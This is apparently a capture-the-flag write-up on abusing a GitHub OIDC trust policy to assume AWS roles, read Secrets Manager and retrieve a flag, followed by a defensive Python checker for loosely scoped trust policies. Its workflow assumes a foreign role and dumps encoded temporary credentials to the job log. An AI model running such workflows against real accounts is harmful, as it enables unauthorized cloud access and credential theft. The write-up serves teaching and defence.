Action Theft Repo

Viewing the S3 bucket, we found a reference to a GitHub organization URL: https://github.com/HEXNOVA404

Manually enumerating the GitHub organization, we found GitHub Actions logs that leaked the role name: https://github.com/HEXNOVA404/Organisation-Vault/actions/runs/16701033362/job/47272191258

Decoding the role ARN and secret ID gives:
arn:aws:iam::170974506515:role/github-deployment-role
internal/secrets/id-v2
Based on the challenge description, we know the attacker managed to assume the role, access Secrets Manager and escalate privileges to a different role. The hint also mentions a GitHub gist, so let's take a look at that.

In the GitHub gist, we found an internal access policy document at https://gist.github.com/HEXNOVA404/22afdb23005985e378def7ed7bf0da51

From this we have the full attack chain:
1. Exploit GitHub OIDC to assume the arn:aws:iam::170974506515:role/github-deployment-role role.
2. Retrieve the secrets at internal/secrets/id-v2.
3. Use the secret's external ID to assume the prod-readonly-auditor role.
4. Retrieve the flag at ci-deployment-logsv1.
I created a private GitHub repo and set up the GitHub Actions workflow as follows.
name: Deploy to Prod
on:
  workflow_dispatch:
permissions:
  id-token: write
  contents: read
jobs:
  tf:
    name: Run Terraform
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Auth to AWS
        uses: aws-actions/configure-aws-credentials@v4
        with:
          aws-region: us-west-2
          role-to-assume: arn:aws:iam::170974506515:role/github-deployment-role
          role-external-id: extidHX9F3A1
      - name: Encode creds for export
        run: |
          KEY_ID=$(echo -n "$AWS_ACCESS_KEY_ID" | gzip -c | base64)
          SECRET_KEY=$(echo -n "$AWS_SECRET_ACCESS_KEY" | gzip -c | base64)
          SESSION_TOKEN=$(echo -n "$AWS_SESSION_TOKEN" | gzip -c | base64)
          echo "$KEY_ID"
          echo "$SECRET_KEY"
          echo "$SESSION_TOKEN"
Running the GitHub Actions workflow, I managed to get the temporary credentials of the assumed role.


Next, I'll get the external ID from Secrets Manager.

With the external id, we are able to assume the prod-readonly-auditor role.

With that we can access the S3 bucket and retrieve the flag.
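The workflow above ran from a repository I created, so the github-deployment-role trust policy must have accepted GitHub OIDC tokens from outside the HEXNOVA404 organization. As an added example that is not part of the original write-up, the Python check below flags exactly that misconfiguration: Allow statements for the GitHub OIDC provider whose `sub` condition is missing or not pinned to a single owner/repo (the sample trust policies and the account ID in them are constructed).

```python
# Added audit helper (not from the original write-up). Flags IAM trust policies
# that let GitHub Actions OIDC tokens assume a role without pinning the
# token's `sub` claim to one owner/repo; sample policies below are constructed.
PROVIDER = "token.actions.githubusercontent.com"
SUB_KEY, AUD_KEY = f"{PROVIDER}:sub", f"{PROVIDER}:aud"

def _as_list(v):
    return v if isinstance(v, list) else [v]

def audit_github_oidc_trust(policy):
    """Return (statement_index, reason) findings for a trust policy dict."""
    findings = []
    for i, stmt in enumerate(_as_list(policy.get("Statement", []))):
        fed = _as_list(stmt.get("Principal", {}).get("Federated", []))
        if stmt.get("Effect") != "Allow" or not any(PROVIDER in p for p in fed):
            continue  # not a GitHub OIDC Allow statement
        cond = stmt.get("Condition", {})
        keys = {k for kv in cond.values() for k in kv}
        if AUD_KEY not in keys:
            findings.append((i, "no aud condition (expect sts.amazonaws.com)"))
        subs = [s for kv in cond.values() for k, v in kv.items()
                if k == SUB_KEY for s in _as_list(v)]
        if not subs:
            findings.append((i, "no sub condition: any GitHub repo can assume this role"))
        for s in subs:
            # Expect repo:<owner>/<repo>:<ref or environment>; anything looser is flagged
            parts = s.split(":")
            if len(parts) < 3 or parts[0] != "repo" or "*" in parts[1] or parts[1].count("/") != 1:
                findings.append((i, f"sub pattern not pinned to one repo: {s}"))
    return findings

def _trust(condition):
    # Constructed trust policy; the account ID is a placeholder, not the challenge's
    return {"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow",
        "Principal": {"Federated": f"arn:aws:iam::123456789012:oidc-provider/{PROVIDER}"},
        "Action": "sts:AssumeRoleWithWebIdentity",
        "Condition": condition}]}

AUD = {"StringEquals": {AUD_KEY: "sts.amazonaws.com"}}
WEAK_TRUST = _trust(AUD)  # aud only: a token from any GitHub repo passes
ORG_WIDE_TRUST = _trust({**AUD, "StringLike": {SUB_KEY: "repo:HEXNOVA404/*:*"}})
PINNED_TRUST = _trust({**AUD, "StringLike": {SUB_KEY: "repo:HEXNOVA404/Organisation-Vault:ref:refs/heads/main"}})

if __name__ == "__main__":
    for name, pol in [("weak", WEAK_TRUST), ("org-wide", ORG_WIDE_TRUST), ("pinned", PINNED_TRUST)]:
        print(name, audit_github_oidc_trust(pol))
```

To run it against a real account, feed it `json.loads` of each role's AssumeRolePolicyDocument from `iam:ListRoles`; only WEAK_TRUST would have let a workflow from an arbitrary private repo assume the role.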
